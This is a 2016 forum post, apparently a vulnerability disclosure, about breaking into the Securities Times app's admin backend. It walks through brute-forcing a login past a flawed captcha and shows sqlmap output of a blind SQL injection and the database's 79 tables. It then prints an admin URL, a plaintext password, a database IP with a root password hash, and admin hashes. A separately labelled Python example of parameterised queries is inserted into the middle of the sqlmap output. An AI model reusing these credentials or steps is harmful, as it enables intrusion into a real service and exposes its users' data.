HanDs
Administrator

[Vulnerability disclosed in July] SQL injection in the Securities Times (证券时报) app affects all registered users






As in the title.

Detailed description:

WooYun: A vulnerability in Securities Times (involving the app, database, securities, stock price charts, etc.)



According to that report, the app's admin backend can be obtained from it; in fact that is not even necessary, it can simply be found inside the app.



http://appzd.zxzx.stcn.com/admin/admin/adminLogin.do



Here:

Brute-forced the username. The captcha is flawed, so the brute force succeeded directly.

Code:
lidongping  123456





Logged in.

1.png





Found the SQL injection:

Code:
back-end DBMS: MySQL 5.0
Database: zhengquanshibaoapp
[79 tables]
+-----------------------------------------+
| bt_config |
| bt_rights |
| t_admin |
| t_banner |
| t_blocks |
| t_category |
| t_category_common |
| t_combination |
| t_combination_common |
| t_combination_favorite |
| t_combination_read |
| t_common |
| t_common_prev |
| t_favorable |
| t_favorable_category |
| t_folder |
| t_folder_rights |
| t_identity |
| t_identity_role |
| t_message |
| t_message_user |
| t_new_case |
| t_newcase_read |
| t_order |
| t_orderItem |
| t_region |
| t_role |
| t_role_rights |
| t_socket_news |
| t_symbol |
| t_tencentpost |
| t_token |
| t_user |
| t_user_category |
| t_user_device |
| t_user_track_Spider |
| t_user_track_lyc |
| t_v_combinationfavorite |
| test_c3p0 |
| v_t_admin |
| v_t_app_user_order_category |
| v_t_article_category |
| v_t_blocks_admin |
| v_t_blocks_category |
| v_t_category_common_block |
| v_t_category_common_combination_commmon |
| v_t_category_favorable |
| v_t_combination_category |
| v_t_combination_category_all |
| v_t_combination_category_all_app |
| v_t_combination_category_user |
| v_t_combination_common |
| v_t_combination_common_category |
| v_t_combination_common_top |
| v_t_combination_preview |
| v_t_combination_read |
| v_t_combination_read_app |
| v_t_combination_user_read |
| v_t_common_admin |
| v_t_common_category_admin |
| v_t_common_prev_admin |
| v_t_config_admin |
| v_t_folder_rights |
| v_t_folder_rights_role |
| v_t_message_admin |
| v_t_message_no_user |
| v_t_message_user |
| v_t_message_user_admin |
| v_t_message_user_admin_sta |
| v_t_order_orderItem |
| v_t_order_orderitem |
| v_t_role_identity |
| v_t_role_rights_menu |
| v_t_statistics |
| v_t_symbol_admin |
| v_t_user_device_info |
| v_t_user_order_category |
| v_t_user_order_orderItem |
| v_t_user_region |
+-----------------------------------------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: boolean-based blind
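As an added example, not part of the original report: why a boolean-based blind injection point like the one sqlmap found exists, and how a bound parameter removes it. The lookup functions, the t_admin column names and the rows are constructed assumptions standing in for the app's real code and data.

```python
# Added example (not from the original report): a string-built query exposes a
# boolean oracle, a parameterised query does not. In-memory SQLite stands in
# for the app's MySQL database; column names and rows are constructed.
import sqlite3


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE t_admin (username TEXT, pwd_hash TEXT)")
    conn.executemany(
        "INSERT INTO t_admin VALUES (?, ?)",
        [("lidongping", "constructed-hash-1"), ("hemin", "constructed-hash-2")],
    )
    return conn


def lookup_vulnerable(conn, username):
    # String concatenation: the attacker-controlled value becomes SQL syntax.
    sql = "SELECT COUNT(*) FROM t_admin WHERE username = '%s'" % username
    return conn.execute(sql).fetchone()[0]


def lookup_safe(conn, username):
    # Bound parameter: the value is treated as data, never parsed as SQL.
    sql = "SELECT COUNT(*) FROM t_admin WHERE username = ?"
    return conn.execute(sql, (username,)).fetchone()[0]


def has_boolean_oracle(lookup, conn):
    """True if appending a TRUE vs a FALSE condition to the input changes the
    answer. That difference is exactly what boolean-based blind extraction
    relies on; a fixed endpoint gives the same answer for both probes."""
    true_probe = "hemin' AND '1'='1"
    false_probe = "hemin' AND '1'='2"
    return lookup(conn, true_probe) != lookup(conn, false_probe)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable has oracle:", has_boolean_oracle(lookup_vulnerable, db))
    print("parameterised has oracle:", has_boolean_oracle(lookup_safe, db))
```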



Dumped:



database management system users password hashes:






Previous database password:

Quattro!






Database password. The database address obtained is:

115.29.185.90

Account: root

Password: B0D78FF9CCB69C7D308259E76EA231B5E6DAA4D2



Accounts:

liuyufeng e24d3a6718be9dd73a94a3277c8ee6fa

hemin 143e4ff1b57893f8a62fb729cfa187f6

Into the backend:

3.png





4.png



6.png





Affects all users of the app.

Proof of vulnerability:

(Identical to the detailed description above.)

Remediation:


Securities
#1
Posted: 2016-7-19   |   Views: 0   |   Replies: 0